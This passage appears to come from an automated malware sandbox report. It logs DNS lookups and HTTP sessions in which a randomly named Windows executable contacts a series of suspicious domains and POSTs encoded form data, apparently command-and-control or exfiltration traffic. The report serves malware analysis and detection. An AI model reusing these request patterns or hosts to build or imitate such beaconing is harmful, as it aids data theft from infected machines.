Oct 7, 2024 11:54:48.488708019 CEST	49821	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:48.588429928 CEST	80	49821	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:48.590940952 CEST	80	49821	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:48.590951920 CEST	80	49821	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:48.591303110 CEST	49821	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:48.594551086 CEST	49821	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:48.597532034 CEST	80	49821	3.33.130.190	192.168.11.30
Oct 7, 2024 11:54:48.597654104 CEST	49821	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:54:48.694427967 CEST	80	49821	3.33.130.190	192.168.11.30

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 11:51:08.890232086 CEST	57838	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:51:08.996889114 CEST	53	57838	1.1.1.1	192.168.11.30
Oct 7, 2024 11:51:25.160506010 CEST	53467	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:51:25.423321009 CEST	53	53467	1.1.1.1	192.168.11.30
Oct 7, 2024 11:51:38.969515085 CEST	51123	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:51:39.982573986 CEST	51123	53	192.168.11.30	9.9.9.9
Oct 7, 2024 11:51:40.083247900 CEST	53	51123	9.9.9.9	192.168.11.30
Oct 7, 2024 11:51:40.822916031 CEST	53	51123	1.1.1.1	192.168.11.30
Oct 7, 2024 11:51:43.123482943 CEST	49833	53	192.168.11.30	9.9.9.9
Oct 7, 2024 11:51:43.223759890 CEST	53	49833	9.9.9.9	192.168.11.30
Oct 7, 2024 11:51:48.233614922 CEST	52680	53	192.168.11.30	9.9.9.9
Oct 7, 2024 11:51:48.598057032 CEST	53	52680	9.9.9.9	192.168.11.30
Oct 7, 2024 11:52:02.765330076 CEST	61655	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:52:02.878453016 CEST	53	61655	1.1.1.1	192.168.11.30
Oct 7, 2024 11:52:18.946438074 CEST	50286	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:52:19.678098917 CEST	53	50286	1.1.1.1	192.168.11.30
Oct 7, 2024 11:52:33.645540953 CEST	51679	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:52:33.933737040 CEST	53	51679	1.1.1.1	192.168.11.30
Oct 7, 2024 11:52:47.440392971 CEST	59047	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:52:47.580432892 CEST	53	59047	1.1.1.1	192.168.11.30
Oct 7, 2024 11:53:00.717778921 CEST	61664	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:53:00.954319954 CEST	53	61664	1.1.1.1	192.168.11.30
Oct 7, 2024 11:53:14.417984009 CEST	59426	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:53:14.596005917 CEST	53	59426	1.1.1.1	192.168.11.30
Oct 7, 2024 11:53:27.727606058 CEST	49204	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:53:28.265759945 CEST	53	49204	1.1.1.1	192.168.11.30
Oct 7, 2024 11:53:42.364881039 CEST	58007	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:53:42.486965895 CEST	53	58007	1.1.1.1	192.168.11.30
Oct 7, 2024 11:53:56.533685923 CEST	51287	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:53:56.825905085 CEST	53	51287	1.1.1.1	192.168.11.30
Oct 7, 2024 11:54:10.358432055 CEST	49505	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:54:11.015561104 CEST	53	49505	1.1.1.1	192.168.11.30
Oct 7, 2024 11:54:24.512546062 CEST	61838	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:54:24.850049973 CEST	53	61838	1.1.1.1	192.168.11.30
Oct 7, 2024 11:54:40.288988113 CEST	53635	53	192.168.11.30	1.1.1.1
Oct 7, 2024 11:54:40.458062887 CEST	53	53635	1.1.1.1	192.168.11.30

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 11:51:08.890232086 CEST	192.168.11.30	1.1.1.1	0xe57c	Standard query (0)	www.07t90q.vip	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:25.160506010 CEST	192.168.11.30	1.1.1.1	0x7baa	Standard query (0)	www.concept.pink	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:38.969515085 CEST	192.168.11.30	1.1.1.1	0xc514	Standard query (0)	www.5oxzis.top	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:39.982573986 CEST	192.168.11.30	9.9.9.9	0xc514	Standard query (0)	www.5oxzis.top	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:43.123482943 CEST	192.168.11.30	9.9.9.9	0x8d13	Standard query (0)	www.5oxzis.top	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:48.233614922 CEST	192.168.11.30	9.9.9.9	0x2335	Standard query (0)	www.kuaimaolife.shop	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:02.765330076 CEST	192.168.11.30	1.1.1.1	0x40af	Standard query (0)	www.nodigitalsmoke.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:18.946438074 CEST	192.168.11.30	1.1.1.1	0xa254	Standard query (0)	www.synd.fun	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:33.645540953 CEST	192.168.11.30	1.1.1.1	0x2117	Standard query (0)	www.redlakedispensery.net	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:47.440392971 CEST	192.168.11.30	1.1.1.1	0x7e63	Standard query (0)	www.online-dating28.xyz	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:00.717778921 CEST	192.168.11.30	1.1.1.1	0x8ad8	Standard query (0)	www.tribevas.online	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:14.417984009 CEST	192.168.11.30	1.1.1.1	0xa6fa	Standard query (0)	www.stratogent.info	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:27.727606058 CEST	192.168.11.30	1.1.1.1	0x927e	Standard query (0)	www.it9.shop	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:42.364881039 CEST	192.168.11.30	1.1.1.1	0x3aa0	Standard query (0)	www.artherapy.online	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:56.533685923 CEST	192.168.11.30	1.1.1.1	0xe21e	Standard query (0)	www.acuarelacr.buzz	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:54:10.358432055 CEST	192.168.11.30	1.1.1.1	0xcb64	Standard query (0)	www.toteforcar.site	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:54:24.512546062 CEST	192.168.11.30	1.1.1.1	0xc0a6	Standard query (0)	www.neuro-practicum.online	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:54:40.288988113 CEST	192.168.11.30	1.1.1.1	0x757a	Standard query (0)	www.ara-store.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 11:51:08.996889114 CEST	1.1.1.1	192.168.11.30	0xe57c	No error (0)	www.07t90q.vip	07t90q.vip		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 11:51:08.996889114 CEST	1.1.1.1	192.168.11.30	0xe57c	No error (0)	07t90q.vip		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:08.996889114 CEST	1.1.1.1	192.168.11.30	0xe57c	No error (0)	07t90q.vip		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:25.423321009 CEST	1.1.1.1	192.168.11.30	0x7baa	No error (0)	www.concept.pink	concept.pink		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 11:51:25.423321009 CEST	1.1.1.1	192.168.11.30	0x7baa	No error (0)	concept.pink		217.160.0.27	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:40.083247900 CEST	9.9.9.9	192.168.11.30	0xc514	Name error (3)	www.5oxzis.top	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:40.822916031 CEST	1.1.1.1	192.168.11.30	0xc514	No error (0)	www.5oxzis.top		20.2.217.253	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:43.223759890 CEST	9.9.9.9	192.168.11.30	0x8d13	Name error (3)	www.5oxzis.top	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:51:48.598057032 CEST	9.9.9.9	192.168.11.30	0x2335	No error (0)	www.kuaimaolife.shop		38.55.251.233	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:02.878453016 CEST	1.1.1.1	192.168.11.30	0x40af	No error (0)	www.nodigitalsmoke.org	nodigitalsmoke.org		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 11:52:02.878453016 CEST	1.1.1.1	192.168.11.30	0x40af	No error (0)	nodigitalsmoke.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:02.878453016 CEST	1.1.1.1	192.168.11.30	0x40af	No error (0)	nodigitalsmoke.org		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:19.678098917 CEST	1.1.1.1	192.168.11.30	0xa254	No error (0)	www.synd.fun		194.58.112.174	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:33.933737040 CEST	1.1.1.1	192.168.11.30	0x2117	No error (0)	www.redlakedispensery.net	webredir.vip.gandi.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 11:52:33.933737040 CEST	1.1.1.1	192.168.11.30	0x2117	No error (0)	webredir.vip.gandi.net		217.70.184.50	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:52:47.580432892 CEST	1.1.1.1	192.168.11.30	0x7e63	No error (0)	www.online-dating28.xyz		199.59.243.227	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:00.954319954 CEST	1.1.1.1	192.168.11.30	0x8ad8	No error (0)	www.tribevas.online		184.94.215.26	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:14.596005917 CEST	1.1.1.1	192.168.11.30	0xa6fa	No error (0)	www.stratogent.info	stratogent.info		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 11:53:14.596005917 CEST	1.1.1.1	192.168.11.30	0xa6fa	No error (0)	stratogent.info		76.223.105.230	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:14.596005917 CEST	1.1.1.1	192.168.11.30	0xa6fa	No error (0)	stratogent.info		13.248.243.5	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:28.265759945 CEST	1.1.1.1	192.168.11.30	0x927e	No error (0)	www.it9.shop		121.254.178.239	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:42.486965895 CEST	1.1.1.1	192.168.11.30	0x3aa0	No error (0)	www.artherapy.online	artherapy.online		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 11:53:42.486965895 CEST	1.1.1.1	192.168.11.30	0x3aa0	No error (0)	artherapy.online		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:42.486965895 CEST	1.1.1.1	192.168.11.30	0x3aa0	No error (0)	artherapy.online		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:53:56.825905085 CEST	1.1.1.1	192.168.11.30	0xe21e	No error (0)	www.acuarelacr.buzz		161.97.168.245	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:54:11.015561104 CEST	1.1.1.1	192.168.11.30	0xcb64	No error (0)	www.toteforcar.site		185.104.28.27	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:54:24.850049973 CEST	1.1.1.1	192.168.11.30	0xc0a6	No error (0)	www.neuro-practicum.online		37.140.192.23	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:54:40.458062887 CEST	1.1.1.1	192.168.11.30	0x757a	No error (0)	www.ara-store.com	ara-store.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 11:54:40.458062887 CEST	1.1.1.1	192.168.11.30	0x757a	No error (0)	ara-store.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 7, 2024 11:54:40.458062887 CEST	1.1.1.1	192.168.11.30	0x757a	No error (0)	ara-store.com		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.07t90q.vip

www.concept.pink

www.kuaimaolife.shop

www.nodigitalsmoke.org

www.synd.fun

www.redlakedispensery.net

www.online-dating28.xyz

www.tribevas.online

www.stratogent.info

www.it9.shop

www.artherapy.online

www.acuarelacr.buzz

www.toteforcar.site

www.neuro-practicum.online

www.ara-store.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.30	49764	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:09.124337912 CEST	387	OUT	GET /9eeu/?VzK4o8Jx=sYxoUF2rFRCkhaAkYvMCVRWDMjjY140d56kaE+tBLdvFK0LLAdAC/HAPE2DtjqQpoemNjozj05nG5pG/fmy7ZInj0cRDZa4AaOoOz07zrXAoLhIj+j079Eo=&0zu8A=o2yln6 HTTP/1.1 Host: www.07t90q.vip Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:51:10.116149902 CEST	397	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 07 Oct 2024 09:51:10 GMT Content-Type: text/html Content-Length: 257 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 7a 4b 34 6f 38 4a 78 3d 73 59 78 6f 55 46 32 72 46 52 43 6b 68 61 41 6b 59 76 4d 43 56 52 57 44 4d 6a 6a 59 31 34 30 64 35 36 6b 61 45 2b 74 42 4c 64 76 46 4b 30 4c 4c 41 64 41 43 2f 48 41 50 45 32 44 74 6a 71 51 70 6f 65 6d 4e 6a 6f 7a 6a 30 35 6e 47 35 70 47 2f 66 6d 79 37 5a 49 6e 6a 30 63 52 44 5a 61 34 41 61 4f 6f 4f 7a 30 37 7a 72 58 41 6f 4c 68 49 6a 2b 6a 30 37 39 45 6f 3d 26 30 7a 75 38 41 3d 6f 32 79 6c 6e 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VzK4o8Jx=sYxoUF2rFRCkhaAkYvMCVRWDMjjY140d56kaE+tBLdvFK0LLAdAC/HAPE2DtjqQpoemNjozj05nG5pG/fmy7ZInj0cRDZa4AaOoOz07zrXAoLhIj+j079Eo=&0zu8A=o2yln6"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.30	49765	217.160.0.27	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:25.612481117 CEST	656	OUT	POST /4yov/ HTTP/1.1 Host: www.concept.pink Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.concept.pink Referer: http://www.concept.pink/4yov/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 55 48 36 6c 6f 64 38 50 2f 31 70 6e 4f 49 43 4d 39 59 30 4c 34 35 51 33 75 79 62 4f 48 65 6e 42 74 6b 31 2b 67 58 78 33 55 74 32 6a 6c 63 52 73 48 4c 6a 41 6e 44 7a 4c 52 79 2f 71 41 75 6b 45 74 67 61 37 6d 5a 38 37 76 66 46 50 38 2f 74 2b 6f 44 74 56 6f 4d 5a 30 51 4b 49 39 75 4c 66 2b 41 44 59 54 33 55 68 59 57 55 6c 4a 4f 51 5a 74 51 57 78 47 55 68 59 32 6c 34 4f 41 5a 65 4f 48 44 48 65 68 51 46 30 74 67 39 50 6c 76 73 32 74 7a 6a 32 75 4a 37 67 38 65 50 70 58 78 39 39 65 34 49 59 5a 4e 48 53 41 41 4e 7a 75 56 36 49 49 59 48 70 68 64 77 3d 3d Data Ascii: VzK4o8Jx=9JO441eEy3RNUH6lod8P/1pnOICM9Y0L45Q3uybOHenBtk1+gXx3Ut2jlcRsHLjAnDzLRy/qAukEtga7mZ87vfFP8/t+oDtVoMZ0QKI9uLf+ADYT3UhYWUlJOQZtQWxGUhY2l4OAZeOHDHehQF0tg9Plvs2tzj2uJ7g8ePpXx99e4IYZNHSAANzuV6IIYHphdw==
Oct 7, 2024 11:51:25.795563936 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 07 Oct 2024 09:51:25 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Oct 7, 2024 11:51:25.795648098 CEST	846	IN	Data Raw: c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 90 1f 13 58 fc 28 33 52 6c e9 a9 bd c2 43 1a 8f 54 42 68 18 8f 70 3d e5 35 6a 1e d8 f1 ba 21 51 0d 3d 48 61 ab b9 a0 39 aa 64 e0 47 ee 53 a1 4a 3d 52 43 b9 0d Data Ascii: %oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.Q"xX[iokc:8W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.30	49766	217.160.0.27	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:28.330579996 CEST	676	OUT	POST /4yov/ HTTP/1.1 Host: www.concept.pink Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.concept.pink Referer: http://www.concept.pink/4yov/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 56 6d 4b 6c 37 75 45 50 35 56 70 6b 58 34 43 4d 6f 6f 30 50 34 35 63 33 75 7a 66 67 48 4d 44 42 74 41 78 2b 6a 55 70 33 52 74 32 6a 71 38 52 70 5a 37 6a 31 6e 44 75 30 52 79 7a 71 41 75 77 45 74 6b 53 37 6d 49 38 34 39 2f 46 4e 30 66 74 34 31 7a 74 56 6f 4d 5a 30 51 4b 73 48 75 4c 58 2b 41 53 6f 54 6d 47 46 5a 56 55 6c 4b 4a 51 5a 74 42 6d 77 4e 55 68 59 41 6c 35 6a 56 5a 59 4b 48 44 47 75 68 51 58 63 75 72 39 50 6a 6c 4d 33 38 77 7a 44 56 50 6f 52 4a 65 64 5a 6f 30 4f 4e 33 30 2f 70 44 51 45 6d 43 54 74 50 44 4a 37 6c 67 61 46 6f 36 41 35 69 42 35 53 44 73 52 70 46 39 2b 56 46 6b 4c 38 42 73 46 75 6b 3d Data Ascii: VzK4o8Jx=9JO441eEy3RNVmKl7uEP5VpkX4CMoo0P45c3uzfgHMDBtAx+jUp3Rt2jq8RpZ7j1nDu0RyzqAuwEtkS7mI849/FN0ft41ztVoMZ0QKsHuLX+ASoTmGFZVUlKJQZtBmwNUhYAl5jVZYKHDGuhQXcur9PjlM38wzDVPoRJedZo0ON30/pDQEmCTtPDJ7lgaFo6A5iB5SDsRpF9+VFkL8BsFuk=
Oct 7, 2024 11:51:28.514333010 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 07 Oct 2024 09:51:28 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Oct 7, 2024 11:51:28.514384985 CEST	846	IN	Data Raw: c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 90 1f 13 58 fc 28 33 52 6c e9 a9 bd c2 43 1a 8f 54 42 68 18 8f 70 3d e5 35 6a 1e d8 f1 ba 21 51 0d 3d 48 61 ab b9 a0 39 aa 64 e0 47 ee 53 a1 4a 3d 52 43 b9 0d Data Ascii: %oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.Q"xX[iokc:8W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.30	49767	217.160.0.27	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:51:31.048403025 CEST	3793	OUT	POST /4yov/ HTTP/1.1 Host: www.concept.pink Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.concept.pink Referer: http://www.concept.pink/4yov/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 56 6d 4b 6c 37 75 45 50 35 56 70 6b 58 34 43 4d 6f 6f 30 50 34 35 63 33 75 7a 66 67 48 4d 4c 42 74 56 6c 2b 6b 45 56 33 53 74 32 6a 30 73 52 6f 5a 37 6a 53 6e 44 32 77 52 79 76 51 41 74 49 45 69 6d 4b 37 78 4d 6f 34 6b 50 46 4e 72 50 74 35 6f 44 74 4d 6f 49 39 77 51 4b 63 48 75 4c 58 2b 41 52 41 54 32 6b 68 5a 54 55 6c 4a 4f 51 5a 71 51 57 77 6c 55 68 51 51 6c 35 57 75 5a 61 71 48 44 30 57 68 54 69 6f 75 72 39 50 6a 2f 38 33 78 77 7a 66 55 50 6f 59 65 65 66 35 57 30 2b 70 33 33 49 56 64 42 31 65 6c 51 66 4c 4d 41 4b 64 69 54 46 67 4e 48 4c 75 66 78 54 72 4d 5a 49 70 63 6d 42 56 2f 4d 4a 5a 6e 55 71 55 50 63 37 6d 6d 52 64 41 7a 50 47 57 61 49 55 62 70 4e 43 2f 47 49 7a 7a 43 37 69 4e 57 2f 36 44 46 61 4f 68 63 36 6f 4a 36 77 5a 31 53 37 59 79 46 2b 44 4d 61 75 67 31 64 4e 63 65 74 4f 46 2f 6a 71 36 58 78 2f 36 6f 4a 31 58 64 6f 61 5a 62 69 58 73 6a 73 67 67 52 4b 78 36 45 70 36 6b 34 4a 30 61 4f 49 2b 77 6e 6c 68 45 41 35 7a 51 77 4a 74 [TRUNCATED] Data Ascii: 